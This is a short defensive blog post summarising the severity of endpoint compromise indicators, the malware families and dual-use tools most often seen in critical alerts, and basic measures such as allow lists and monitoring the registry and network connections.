Lets Decode Critical Incidence of Compromise

As a cybersecurity professional, you need to know that in a routine, you would encounter

Not more than 3-5 % Critical Incidents of Compromise
And, around 10% with High Severity!

Remaining 50 % would be of Medium Severity and 35% of Low Severity!

As you might expect, the vast majority of alerts fall into the low and medium categories. There’s a wide variety of IoCs within these severities. How serious a threat, the activity leading to these alerts, pose depends on a number of factors. Right?

Let us focus our thoughts on the critical severity IoCs.

While these make up a small portion of the overall IoC alerts, they’re arguably the most destructive, requiring immediate attention if seen.

The most common threat category seen among these, was FILELESS malware. These IoCs indicate the presence of fileless threats—malicious code that runs in memory after initial infection, rather than through files stored on the hard drive. A good Endpoint Security solution should detect these activities, e.g., suspicious process injections and registry activity. Some threats often seen here include Kovter, Poweliks, Divergent, and LemonDuck.

Next are DUAL-USE tools which can be leveraged for both exploitation and post-exploitation tasks. PowerShell Empire, CobaltStrike, Powersploit, and Metasploit are four such tools currently seen here. While these tools can very well be used for non-malicious activity, such as authorized penetration testing, bad actors frequently utilize them also. If you receive such an alert, and do not have any such active cybersecurity exercises in play, an immediate investigation is must.

The third–most frequently seen IoC group is another category of DUAL-USE tools. Credential dumping is the process used by malicious actors to scrape login credentials from a compromised computer. The most commonly seen of these tools is quite often Mimikatz, which your Endpoint Security solution should caught when credentials are being dumped from the memory.

These first three categories comprise 75 percent of the critical severity IoCs seen. The remaining 25 percent contains a mix of behaviors known to be carried out by well-known threat types:

• Ransomware threats like Ryuk, Maze, BitPaymer, and others
• Worms such as Ramnit and Qakbot
• Remote access trojans like Corebot and Glupteba
• Banking trojans like Cridex, Dyre, Astaroth, and Azorult
• …and finally, a mix of downloaders, wipers, and rootkits

Critical Tactics

While this paints an interesting picture of the threat landscape, things become even more interesting when combining MITRE ATT&CK tactics with IoCs of a critical severity.

• Execution is more common amongst critical severity IoCs than Defense Evasion.
• Persistence appears in 38 percent of critical IoCs, as opposed to 12 percent of IoCs overall.
• Lateral Movement jumps from 4 percent of IoCs seen to 22 percent.
• Credential Access moves up three spots, increasing from 4 percent to 21 percent.

-

What can you do to defend your endpoints?

Here are a few suggestions about things to look at:

1. Limit execution of unknown files
If malicious files can’t be executed, they can’t carry out malicious activity. Use group policies and/or “allow lists” for applications that are permitted to run on endpoints in your environment. That’s not to say that every control available should be leveraged in order to completely lock an endpoint down—limiting end-user permissions too severely can create entirely different usability problems.

2. Limit the use of dual-use tools
If your organization utilizes dual-use tools for activities like remote management, do severely limit the number of accounts that are permitted to run the tools, only granting temporary access when the tools are needed.

3. Monitor processes and the registry
Registry modification and process injection are two primary techniques used by fileless malware to hide its activity. Monitoring the registry for unusual changes and looking for strange process injection attempts will go a long way towards preventing such threats from gaining a foothold.

4. Monitor connections between endpoints
Keep an eye on the connections between different endpoints, as well as connections to servers within the environment. Investigate if two machines are connecting that shouldn’t, or an endpoint is talking to a server in a way that it doesn’t normally. This could be a sign that bad actors are attempting to move laterally across a network.

(Source: Cisco)

--
 Please let me know of what do you think about this in the comment section. You can also share with all if the information shared here helps you in some manner.

If you are truly interested in reading more of such high-quality posts on cybersecurity, you can always let me know by leaving your comments.